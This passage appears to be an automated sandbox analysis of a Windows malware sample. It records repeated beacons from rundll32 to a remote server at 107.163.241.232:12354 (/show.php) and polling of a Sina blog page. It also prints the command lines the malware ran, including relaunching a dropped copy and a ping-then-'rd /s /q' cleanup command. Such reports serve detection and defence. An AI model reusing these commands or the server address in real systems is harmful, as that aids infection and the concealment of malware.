                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              140192.168.2.462241202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:25.276731014 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:26.836364031 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              141192.168.2.464094107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:27.389686108 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              142192.168.2.464295107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:27.516988993 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              143192.168.2.449293202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:28.825407028 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              144192.168.2.449297107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:29.268208027 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              145192.168.2.449302107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:29.553390980 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              146192.168.2.449303202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:29.553591967 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:26:31.043132067 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:26:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              147192.168.2.451032107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:31.752629995 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              148192.168.2.451043107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:31.995491982 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              149192.168.2.451361202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:26:32.977711916 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449854202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:24:48 UTC142OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              2024-12-11 15:24:49 UTC846INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 11 Dec 2024 15:24:48 GMT
                                              Content-Type: text/html
                                              Content-Length: 325
                                              Connection: close
                                              Set-Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; path=/; expires=Sat, 09-Dec-34 15:24:48 GMT; domain=.sina.com.cn
                                              Set-Cookie: U_TRS2=0000001f.32a12510.6759aec0.40768b16; path=/; domain=.sina.com.cn
                                              Origin-Agent-Cluster: ?0
                                              P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Expires: Wed, 11 Dec 2024 15:24:47 GMT
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              DPOOL_HEADER: 10.13.3.117
                                              strict-transport-security: max-age=180
                                              Content-Security-Policy: upgrade-insecure-requests
                                              X-Cache: MISS from 464291b26ee9
                                              Content-Security-Policy: upgrade-insecure-requests
                                              X-Via-SSL: ssl.30.sinag1.bx.lb.sinanode.com
                                              2024-12-11 15:24:49 UTC325INData Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 2d 31 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 2f 63 6f 6e 74 72 6f 6c 2e 62 6c 6f 67 2e 73 69 6e 61 2e 63 6f 6d 2e 63 6e 2f 6d 79
                                              Data Ascii: <meta http-equiv="Expires" CONTENT="-1" ><meta http-equiv="Cache-Control" CONTENT="no-cache" ><meta http-equiv="Cache-Control" CONTENT="no-store" ><meta http-equiv="Pragma" CONTENT="no-cache" ><script>window.location.href='//control.blog.sina.com.cn/my


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449927202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:24:56 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449963202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:00 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.450001202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:04 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.450042202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:08 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.450081202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:12 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.450124202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:16 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.450169202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:20 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.450217202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:24 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.450314202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:32 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.450384202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:36 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.450454202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:40 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.450544202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:44 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.450813202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:52 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.451017202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:25:56 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.451249202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:26:00 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.451630202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:26:08 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.455345202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:26:16 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.457162202.108.0.524436644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-11 15:26:20 UTC238OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Connection: Keep-Alive
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Users\user\Desktop\otsIBG7J9b.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\otsIBG7J9b.exe"
                                              Imagebase:0x400000
                                              File size:72'381 bytes
                                              MD5 hash:8A971E9FE9FA2C3005EE1EB9C143B331
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 2&c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:10:24:25
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 2
                                              Imagebase:0xc80000
                                              File size:18'944 bytes
                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:10:24:26
                                              Start date:11/12/2024
                                              Path:C:\ufcpp.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"
                                              Imagebase:0x400000
                                              File size:72'438 bytes
                                              MD5 hash:1B4C7D94BCF61F9CCE0B29C2D879EE73
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:10:24:26
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\windows\system32\rundll32.exe "c:\agtve\yhnvs.dll",init c:\ufcpp.exe
                                              Imagebase:0xaf0000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:7
                                              Start time:10:24:41
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
                                              Imagebase:0xaf0000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:10:24:42
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
                                              Imagebase:0x310000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:10:24:42
                                              Start date:11/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:10:24:42
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 3
                                              Imagebase:0xc80000
                                              File size:18'944 bytes
                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\agtve\yhnvs.dll",init
                                              Imagebase:0xaf0000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\agtve"
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:10:24:50
                                              Start date:11/12/2024
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 3
                                              Imagebase:0xc80000
                                              File size:18'944 bytes
                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10.2%
                                                Dynamic/Decrypted Code Coverage:3.3%
                                                Signature Coverage:8.2%
                                                Total number of Nodes:183
                                                Total number of Limit Nodes:5
